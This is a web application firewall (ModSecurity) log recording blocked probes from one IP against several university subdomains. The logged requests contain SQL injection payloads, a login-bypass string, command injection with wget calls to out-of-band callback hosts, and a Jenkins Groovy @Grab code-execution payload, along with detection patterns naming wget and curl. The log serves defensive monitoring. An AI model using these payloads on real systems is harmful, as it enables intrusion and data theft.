[Tue Aug 29 11:32:51.460048 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARR23oAAAAF"]
[Tue Aug 29 11:32:51.460061 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARTEJ8AAAAG"]
[Tue Aug 29 11:32:51.461064 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAAQKOgMAAAAs"]
[Tue Aug 29 11:32:51.462709 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARQ32oAAAAB"]
[Tue Aug 29 11:32:51.503862 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAAQKOgQAAAAs"]
[Tue Aug 29 11:32:59.298248 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4UAAAAu"]
[Tue Aug 29 11:32:59.319782 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARYxBsAAAAJ"]
[Tue Aug 29 11:32:59.321374 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24UAAAAF"]
[Tue Aug 29 11:32:59.329707 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARNk7EAAAAS"]
[Tue Aug 29 11:32:59.337042 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4cAAAAu"]
[Tue Aug 29 11:32:59.341382 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAPDoJoAAAAP"]
[Tue Aug 29 11:32:59.359536 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24cAAAAF"]
[Tue Aug 29 11:32:59.377478 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARH7LQAAAAM"]
[Tue Aug 29 11:32:59.382795 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAPDoJwAAAAP"]
[Tue Aug 29 11:32:59.390801 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARNk7QAAAAS"]
[Tue Aug 29 11:32:59.396921 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4oAAAAu"]
[Tue Aug 29 11:32:59.436448 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24kAAAAF"]
[Tue Aug 29 11:32:59.716186 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgz3o1ntkh3dmb5.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARMMfIAAAAR"]
[Tue Aug 29 11:32:59.783998 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgugm9nfjab8q55.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARH7LoAAAAM"]
[Tue Aug 29 11:32:59.803346 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgxt5t98kxdcx83.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARQ34gAAAAB"]
[Tue Aug 29 11:32:59.804064 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgg1iqmnzcbjjza.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARH7LsAAAAM"]
[Tue Aug 29 11:32:59.805032 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgcpnz476hz5k14.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARR25AAAAAF"]
[Tue Aug 29 11:33:00.303186 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgz7p1o55zaz3mz.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10-MCo-f0AAAQMr40AAAAu"]
[Tue Aug 29 11:33:05.766901 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARMMfkAAAAR"]
[Tue Aug 29 11:33:05.767568 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARdiF8AAAAK"]
[Tue Aug 29 11:33:05.770370 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARQ35MAAAAB"]
[Tue Aug 29 11:33:05.783041 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARH7McAAAAM"]
[Tue Aug 29 11:33:05.787159 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAAQKOhgAAAAs"]
[Tue Aug 29 11:33:05.809382 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAAQMr5kAAAAu"]
[Tue Aug 29 11:33:09.404109 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAANsAbgAAAAD"]
[Tue Aug 29 11:33:09.405296 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARQ35UAAAAB"]
[Tue Aug 29 11:33:09.408003 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARYxCAAAAAJ"]
[Tue Aug 29 11:33:09.408003 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAAPDoKQAAAAP"]
[Tue Aug 29 11:33:09.408744 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARdiGIAAAAK"]
